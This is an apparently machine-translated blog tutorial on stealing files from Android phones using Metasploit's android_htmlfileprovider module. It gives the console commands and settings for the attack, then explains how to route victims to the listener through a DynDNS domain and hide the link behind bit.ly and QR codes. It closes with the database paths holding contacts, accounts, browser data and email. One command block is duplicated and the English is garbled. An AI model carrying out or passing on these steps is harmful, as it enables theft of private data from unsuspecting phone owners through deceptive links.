with the operating system
Android. Let's use the already known by some tool, the Metasploit with an
auxiliary your library can be found in OS BackTrack. This can be possible
when a device is connected to your local network, we will use the DynDNS But
that gives us a better grasp of the offense and see how obscure the address via
QR codes and site links that shorten as Lets start ! Steal files
android_htmlfileproviderThe first thing is to get the msfconsole in
terminal backtrack
root @ bt: ~ # / opt/framework3/msf3/msfconsole
Now let's use one of the Metasploit auxiliary modules, which serves exactly our goal:
msf auxiliary (android_htmlfileprovider)> show options
FILES (Android File we want to steal)
SRVHOST (local IP that is waiting for connections)
SRVPORT (The door will be waiting for connections)
SSL (ALTERNATIVE - If you want to use SSL connection negotiation)
SSLVersion (If you have enabled the option above, indicate the version of SSL)
URIPATH (A URI that will be used)
At the moment, we will not touch the FILES option. Have the option to change SRVPORT 80, because that is the standard HTTP port, and will be more suspicious if connecting to another door. Moreover URIPATH will also change, which by default is a random sequence, the victim will be directed to the root server, make the below:
1. msf auxiliary (android_htmlfileprovider)> set SRVPORT 80
2. SRVPORT => 80
3. msf auxiliary (android_htmlfileprovider)> set URIPATH /
4. URIPATH => /
Now we can only begin to exploit using the command run , expect some device and connect to our IP listener.
Now let's use one of the Metasploit auxiliary modules, which serves exactly our goal:
msf> use gather / android_htmlfileprovider
. msf auxiliary (android_htmlfileprovider)>
Now, let's see the options provided by the module ...msf auxiliary (android_htmlfileprovider)> show options
FILES (Android File we want to steal)
SRVHOST (local IP that is waiting for connections)
SRVPORT (The door will be waiting for connections)
SSL (ALTERNATIVE - If you want to use SSL connection negotiation)
SSLVersion (If you have enabled the option above, indicate the version of SSL)
URIPATH (A URI that will be used)
At the moment, we will not touch the FILES option. Have the option to change SRVPORT 80, because that is the standard HTTP port, and will be more suspicious if connecting to another door. Moreover URIPATH will also change, which by default is a random sequence, the victim will be directed to the root server, make the below:
1. msf auxiliary (android_htmlfileprovider)> set SRVPORT 80
2. SRVPORT => 80
3. msf auxiliary (android_htmlfileprovider)> set URIPATH /
4. URIPATH => /
Now we can only begin to exploit using the command run , expect some device and connect to our IP listener.
See the picture below:
 |
|
Implemented Exploit -
CLICK TO ENLARGE
|
Using DynDNS to increase the range
As we say, if we do this attack only for local area
networks (LAN), as smartphones do not usually spend much time connected to a
Wi-Fi network that we are interested. But it is possible to increase this
holding to do so in this case we will use DynDNS, which is a service that
provides dynamic addressing domain site.dyndns type *.Org.
We have to go in http://dyn.com/ site and create an
account. After that, you can register the domain that we have
chosen. After this would go to the router settings and specify the domain,
username and password, as you can see (in other routers may be different).
I must say that DynDNS is an excellent
service. After configuring the DynDNS domain only need to redirect
properly on the router ip. That is, in our case, the victim will connect
to vidasconcurrentes.dyndns.org (on port 80) and should be set to go to the IP
port on which we listen to exploit.
|
|
|
CLICK TO ENLARGE
|
Overshadowing the attack with QR codes
and bit.ly
We have everything for the attack, would have to pass the
url to the victims and wait for it to connect. The problem is that a style
vidasconcurrentes.dyndns.org url can be quite suspect. In this case, use a
URL shortener, bit.ly we will use (you can find several).
Finally, if we want a more viral attack, we can create a QR
code (http://qrcode.kaywa.com/) using the link shortener bit.ly link given us,
and even harder to detect.
The QR will be camouflaged with the link Bit, see the EX:
http://bit.ly/q9wRCW that redirect to the DynDNS domain created in the
vidasconcurrentes.dyndns.org, who will be listening to exploit .. See
Example of QR.
|
|
|
CLICK TO ENLARGE
|
Having succeeded in his invasion, just use creativity to explore some of the
android directories in particular will be listed below: Contacts
Database / data / data / com.android.providers.contacts / databases /
contacts.dbDatabase Browser / data / data /
com.android.browser / databases / browser.db Database Accounts /
data / data / com.google.android.googleapps / databases / accounts.db Database Geolocation /
data / data / com.android.browser / gears / geolocation.db Directory
Database of Telephone / data / data / com.android.providers.telephony
/ databases / database of historical / data / data
/ com.google.android. apps.maps / databases / search_history.db Directory
Database E-Mail / data / data /
com.google.android.providers.gmail / databases /
Posts
0 comments:
Post a Comment